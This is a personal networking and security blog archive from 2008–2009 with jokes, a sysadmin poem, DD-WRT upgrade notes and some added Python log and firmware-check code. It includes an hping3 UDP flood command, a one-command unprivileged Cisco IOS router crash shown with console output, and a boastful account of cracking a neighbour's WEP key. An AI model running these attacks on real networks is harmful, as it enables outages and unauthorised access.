April 9, 2009, 8:55 pm by jlgaddis
No idea where this originated, but I received it several months ago via e-mail. For your enjoyment…
You know you’re a computer security guy (or girl) when…
- You not only lock your laptop with a physical cable leash, but you change the combination of the lock when it’s not in use so that it can’t be “compromised”.
- Although you have no ill intent, you spend no small amount of your downtime in airports thinking of ways to circumvent TSA security — and you’ve come up with several can’t-miss terrorist ideas that even Jack Bauer couldn’t stop.
- You lock your screensaver with twice as much insistence when security friends are around than when strangers are, because you’re not nearly as worried about a stranger’s intentions.
- You’re immediately discontent with all newly announced security solutions, even before you know anything beyond the name.
- Having extra-long passwords that you must type over and over again to get correct is not a bother.
- You have a database program to store all your passwords, but even it doesn’t contain a single, decoded password.
- When you read industry-mandated security guidelines, you chuckle at all the newbie mistakes.
- You secretly hope you don’t miss a big virus outbreak while you are out on vacation.
- Any security book you read is covered in pen from the technical corrections you’ve made.
- Your Internet browser home page is a computer security news bundling Web site.
- You’ve so fine-tuned your personal computer’s host-based firewall that you are sure it is causing problems with legitimate programs, but you really don’t care.
- You fantasize about a job where you could bust into the house of unsuspecting malicious hackers and take them away to jail.
- You’ve got a new car with a built-in GPS and computer, but you are constantly worried about how easy it would be to hack.
- You suspect that every banner and Flash ad on every Web site is hosting malicious JavaScript.
- You loathe government interference with the Internet because you know they will only mess it up more and not fix the problem (see CAN-SPAM Act).
- When you hear that we’ve arrested some big spammer, you have the same nonreaction as when you hear we’ve arrested Al-Qaeda’s No. 2 person … again.
- You resist every new application install because of the new attack vector opportunities it will bring.
- You know that mobile small-form-factor computers have almost no security.
- Your cell phone is password-protected.
- You resent having to give out your Social Security number to any person or company, especially because you have never given it when dealing with the Social Security administration.
- You already own or covet one of those special screen covers that prevent people on either side of you from reading your screen.
- You can’t prevent yourself from laughing out loud when someone announces they think that computer viruses, buffer overflows, or whatever will be solved in five years.
- You hate upgrading your computer because it means spending days trying to copy and convert all your cool hacker and anti-hacker tools to the new system.
- You have solid friends on computer security discussion lists, whom you know would be there for you in a life-crisis pinch but that you’ve never met in person or talked to on the phone.
- Although you never try to shoulder surf other people’s passwords, you can always tell by sound alone when they haven’t typed one that is eight characters or more, and you chuckle inside.
- When someone hands you their USB key to copy something, you always decline, and instead offer your known, clean USB key. You would also prefer one-time, disposable, Tupperware-like memory drives if they existed.
- You always slow down when reading security guidance looking for the words “should,” “must,” “never,” and “always” — and you understand their importance.
- By the time you read a CERT security bulletin, you’ve known about the issue for several days.
- You always investigate SSL certificate errors when they come up in your browser.
- Finally, you know you’re a computer security person when you have so frequently spoken passionately to complete strangers about computer security and the frustration it entails that you know what it’s like to be covered in sweat — and the listening party to have a look on their face that says they didn’t know what they were in for.
Are there others? Post them in the comments below!
December 22, 2008, 12:33 am by jlgaddis
"A" is for Arrogance, properly done.
"B" is for Bastard, the New Zealand one.
"C" is for Cynic, jaded and tired;
it's also for Caffeine, which keeps us all wired.
"D" for Delete, we'll do it to you;
"E" for 31337, the skr1pt-k1ddie's due.
"F" is for Format(1M), we use it on disks,
"G" is the middle name of the guy who does RISKS.
"H" for the Hubris that makes lusers luse;
"I"'m the Important one, the person who su(8)'s.
"J" is for Jaded, see "C" above;
"K" is for Kill(1), a command we all love.
"L" is for Luser, the sysadmin's bane,
"M" with a "4" keeps the mail gurus sane.
"N" is for No, whatever the question,
"O" is for Octal, the way of permissions.
"P" is for Password, have you changed yours lately?
"Q" is for Quotas, which simplify greatly.
"R" is for Random, a most useful quality,
"S" I can't tell you, it's against policy.
"T" is for TECO, a very old editor,
"U" is for Unix, which has no competitor.
"V" is the System whose Release 4 we wrestle with,
"W" is for W(1), to see who(1) we nestle with.
"X" is the windowing system from Hell,
"Y" do we use it? The rest suck as well!
"Z" is for Zero, indicating success
It terminates programs -- and alphabets, yes.
–Unknown
December 20, 2008, 1:55 am by jlgaddis
I was bored so decided to play with hping3 a bit tonight.
[jlgaddis@bertram:~]$ sudo hping3 --udp -p 10000 --destport 10000 --flood 192.168.1.12
HPING 192.168.1.12 (eth0 192.168.1.12): udp mode set, 28 headers + 1400 data bytes
hping in flood mode, no replies will be shown
I have the same thing running 192.168.1.12 as well, for “bi-directional” traffic.
c1811# sh int fa7 | in put\ rate
5 minute input rate 96657000 bits/sec, 8404 packets/sec
5 minute output rate 93537000 bits/sec, 11389 packets/sec

December 6, 2008, 2:51 pm by jlgaddis
Two 7200s connected back to back via their serial 2/0 ports. Bring up a link, establish a BGP neighbor relationship between them and then kill your router. The cool thing is, you can even do it from unprivileged mode:
c7200-b# conf t
c7200-b(config)# int loopback 0
*Dec 6 19:36:57.871: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback0, changed state to up
c7200-b(config-if)# ip address 192.168.1.1 255.255.255.0
c7200-b(config-if)# interface serial 2/0
c7200-b(config-if)# ip address 10.0.0.2 255.255.255.252
c7200-b(config-if)# no shutdown
c7200-b(config-if)#
*Dec 6 19:37:13.875: %LINK-3-UPDOWN: Interface Serial2/0, changed state to up
c7200-b(config-if)#
*Dec 6 19:37:13.879: %ENTITY_ALARM-6-INFO: CLEAR INFO Se2/0 Physical Port Administrative State Down
c7200-b(config-if)#
*Dec 6 19:37:14.883: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state to up
c7200-b(config-if)# do ping 10.0.0.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 10.0.0.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/13/24 ms
c7200-b(config-if)# router bgp 65001
c7200-b(config-router)# neighbor 10.0.0.1 remote-as 65000
c7200-b(config-router)# network 192.168.1.0 mask 255.255.255.0
c7200-b(config-router)# end
c7200-b#
*Dec 6 19:37:36.911: %SYS-5-CONFIG_I: Configured from console by console
c7200-b#
*Dec 6 19:37:40.919: %BGP-5-ADJCHANGE: neighbor 10.0.0.1 Up
c7200-b# show ip bgp
BGP table version is 3, local router ID is 192.168.1.1
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale
Origin codes: i - IGP, e - EGP, ? - incomplete
Network Next Hop Metric LocPrf Weight Path
*> 192.168.0.0 10.0.0.1 0 0 65000 i
*> 192.168.1.0 0.0.0.0 0 32768 i
c7200-b# exit
Then, while in unprivileged mode…
c7200-b> show ip bgp version 3
…and that’s it. From the other router, we see that it’s down:
c7200-a> ping 10.0.0.2
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 10.0.0.2, timeout is 2 seconds:
.....
Success rate is 0 percent (0/5)
c7200-a>
And a moment later we’ll see the BGP adjacency go down:
*Dec 6 19:42:59.419: %BGP-5-ADJCHANGE: neighbor 10.0.0.2 Down Interface flap
c7200-a>
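An added example, not code from the post: a small parser for the IOS console messages shown above. It replays the %BGP-5-ADJCHANGE lines so an operator watching a syslog feed can see which peer went down and the reason IOS attached to it, and it skips the interleaved prompt lines. The sample log is constructed from the lines in this post.

```python
import re

# IOS console/syslog format seen above:
#   *Dec 6 19:42:59.419: %BGP-5-ADJCHANGE: neighbor 10.0.0.2 Down Interface flap
IOS_LOG_RE = re.compile(
    r"^\*?(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2}(?:\.\d+)?):\s+"
    r"%(?P<facility>[A-Z0-9_]+)-(?P<severity>\d)-(?P<mnemonic>[A-Z0-9_]+):\s+"
    r"(?P<message>.*)$"
)
# Message body of a BGP adjacency change; the reason is only present on Down.
BGP_ADJ_RE = re.compile(r"^neighbor (?P<peer>\S+) (?P<state>Up|Down)(?: (?P<reason>.+))?$")

# Constructed sample built from the console output in this post (prompt line included on purpose).
SAMPLE_LOG = """\
*Dec 6 19:37:13.875: %LINK-3-UPDOWN: Interface Serial2/0, changed state to up
*Dec 6 19:37:14.883: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state to up
*Dec 6 19:37:36.911: %SYS-5-CONFIG_I: Configured from console by console
*Dec 6 19:37:40.919: %BGP-5-ADJCHANGE: neighbor 10.0.0.1 Up
c7200-a>
*Dec 6 19:42:59.419: %BGP-5-ADJCHANGE: neighbor 10.0.0.2 Down Interface flap
""".splitlines()

def parse_ios_log(line):
    """Return the structured fields of one IOS message, or None for prompts and other noise."""
    m = IOS_LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["severity"] = int(rec["severity"])   # 0 = emergency ... 7 = debug
    return rec

def bgp_neighbor_states(lines):
    """Replay ADJCHANGE events; return {peer: (last_state, reason_or_None)}."""
    states = {}
    for line in lines:
        rec = parse_ios_log(line)
        if not rec or rec["facility"] != "BGP" or rec["mnemonic"] != "ADJCHANGE":
            continue
        m = BGP_ADJ_RE.match(rec["message"])
        if m:
            states[m["peer"]] = (m["state"], m["reason"])
    return states

def down_peers(lines):
    """Peers whose most recent event was Down, with the reason IOS reported."""
    return {p: r for p, (s, r) in bgp_neighbor_states(lines).items() if s == "Down"}

def severe_messages(lines, max_severity=3):
    """Messages at severity max_severity or worse (lower number is more severe)."""
    recs = (parse_ios_log(l) for l in lines)
    return [r for r in recs if r and r["severity"] <= max_severity]
```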
November 18, 2008, 1:56 am by jlgaddis
While browsing through my archives tonight, my thoughts went back to the reliable little Buffalo WHR-G125 router/access point over in the corner. Back in January, I wrote about having issues with my MacBook’s wireless and upgrading to — at the time — the latest version of DD-WRT to see if it would help with the issues.
Many months have passed since then and the wireless issues have gone away. Unfortunately, I don’t really remember when they went away. I’m not sure if it had anything to do with the firmware upgrade or not.
Regardless, I browsed over to the DD-WRT site again to see if there was newer firmware available. There was, so I decided to upgrade. Upgrading to the latest version was really easy:
[jlgaddis@cleveland ~]$ ssh root@ap
root@ap's password:
root@router:~# cd /tmp
root@router:/tmp# wget http://tinyurl.com/5qv69u
root@router:/tmp# write dd-wrt.v24_vpn_generic.bin linux
At this point, we have a few minutes to kill. The flash memory isn’t the fastest in the world, and it’ll take a bit to save the file to flash. Once it’s done and our prompt has come back, we just need to reboot.
root@router:/tmp# reboot
Give the router a minute or two to reboot, and we should be able to login again:
[jlgaddis@cleveland ~]$ ssh root@ap
DD-WRT v24 vpn (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)
root@ap's password:
==========================================================
DD-WRT v24
http://www.dd-wrt.com
==========================================================
BusyBox v1.11.1 (2008-07-27 16:20:53 CEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
root@router:~# exit
Connection to ap closed.
[jlgaddis@cleveland ~]$
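An added check that the post itself skips (my code, not DD-WRT’s): the image is pulled over plain HTTP through a URL shortener and written straight to flash, so before running write it is worth confirming that the download is a full-sized image whose SHA-256 matches the hash published for it. The expected hash, the 2 MiB stand-in image and the short “redirect page” file are constructed placeholders; whether the download page publishes SHA-256 or another digest is an assumption, so adjust the hash function to match.

```python
import hashlib
import hmac
import os
import tempfile

def sha256_of_file(path, chunk=1 << 20):
    """Stream the file through SHA-256 so a multi-megabyte image need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def verify_firmware(path, expected_sha256, min_size=1 << 20):
    """Return (ok, reason). A short file (HTML error or redirect page, truncated transfer)
    is rejected before hashing; otherwise the digest must match the published one."""
    size = os.path.getsize(path)
    if size < min_size:
        return False, f"image is only {size} bytes, expected at least {min_size}"
    digest = sha256_of_file(path)
    if not hmac.compare_digest(digest, expected_sha256.strip().lower()):
        return False, f"sha256 mismatch: got {digest}"
    return True, "ok"

def flash_command(path, expected_sha256):
    """The 'write <image> linux' line from the post, produced only for a verified image."""
    ok, _ = verify_firmware(path, expected_sha256)
    return f"write {os.path.basename(path)} linux" if ok else None

def run_demo():
    """Constructed inputs: a 2 MiB filler file standing in for dd-wrt.v24_vpn_generic.bin
    and a tiny file standing in for what a broken shortener link might hand back."""
    tmp = tempfile.mkdtemp()
    filler = b"\x55\xaa" * (1 << 20)                     # not a real firmware image
    good = os.path.join(tmp, "dd-wrt.v24_vpn_generic.bin")
    with open(good, "wb") as f:
        f.write(filler)
    published = hashlib.sha256(filler).hexdigest()       # stands in for the vendor-published hash
    short = os.path.join(tmp, "5qv69u")
    with open(short, "wb") as f:
        f.write(b"<html>Moved Permanently</html>\n")
    return {
        "good": verify_firmware(good, published)[0],
        "wrong_hash": verify_firmware(good, "0" * 64)[0],
        "short": verify_firmware(short, published)[0],
        "command": flash_command(good, published),
    }
```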
February 29, 2008, 2:57 am by jlgaddis
i got bored tonight and, for some reason, decided to get out my trusty old dell laptop that has fedora linux (and, coincidentally, aircrack-ng) on it. as i was getting it, i saw my netgear wg511t wireless card that i bought specifically because it supported packet reinjection. fun ensued. using the somewhat new “ptw method”, i was able to crack a neighbor’s 128-bit wep key in as little as 96 seconds. as i noted on twitter, “even after all the times i’ve done it, i still get such a thrill out of cracking wep”.
February 28, 2008, 11:36 pm by jlgaddis
February 1, 2008, 2:56 am by jlgaddis
stan schroeder’s article “richard stallman invents new way of browsing the web” on mashable directed me to this e-mail on the misc@openbsd.org list where stallman (allegedly) states:
for personal reasons, i do not browse the web from my computer. (i also have no net connection much of the time.) to look at a page i send mail to a demon which runs wget and mails the page back to me. it is very efficient use of my time, but it is slow in real time.
this took me on a trip down memory lane. i can remember, 13 or 14 years ago, when i had to access the internet via long-distance phone calls (which didn’t please my parents a whole lot). juno came out with a service where they provided free e-mail to anyone (ad supported) and even had a 1-800 number you could use to avoid long-distance charges. the proprietary client would dial up, send any queued mail, download any received mail, and disconnect.
some of us discovered that it was possible to access the internet by e-mail. using juno’s free e-mail service, you could construct specially crafted e-mail messages and send them to certain “gateways” to do things like download web pages, perform archie searches, and even ftp files.
ahh, the good ol’ days. =)
January 30, 2008, 11:41 pm by jlgaddis
a little over three months ago i replaced my aging linksys wrt54g wireless router with a buffalo whr-g125 specifically to run dd-wrt on it. in the last month or so since i got my macbook it will occasionally become disconnected from the wireless network (wpa2/personal) and the only solution is to hard reboot the whr-g125 (the wired pcs never lose connectivity). i never had that problem with my dell or toshiba laptops (running windows xp), so i’m inclined to believe that the problem has something to do with the shiny new macbook (note that i could connect to other wireless networks just fine — open access points ftw!).
tonight i wondered if there might be newer firmware available and it just so happened there was. i was running “v24 beta (08/15/07) vpn” and am now running “v24 rc-5 (11/22/07) vpn” so i’ll monitor things for a while and see if it keeps happening. it could be that it was a bug in the previous version, it could be something flaky on my macbook. who knows!?
January 24, 2008, 10:35 pm by jlgaddis
i’m highly disappointed, to be quite honest. it’s fun to follow the happenings, though.